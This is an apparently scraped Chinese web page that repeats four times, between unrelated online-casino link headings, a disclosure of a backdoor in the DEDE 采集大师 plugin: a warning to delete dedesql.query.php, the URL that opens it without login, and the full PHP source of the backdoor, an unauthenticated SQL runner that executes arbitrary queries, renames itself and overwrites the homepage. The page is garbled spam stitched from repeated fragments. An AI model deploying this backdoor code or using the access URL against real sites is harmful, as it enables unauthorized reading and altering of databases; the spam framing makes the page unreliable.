width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>。喜来登线上娱乐备用网址

展开全文
相关文章
战神娱乐备用网站

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

瑞丰备用网址bet16

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

环亚国际备用

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>....

金沙澳门38@js的备用网址是什么

DEDE采集大师官方留后门的删除办法....

fun88乐天堂备用

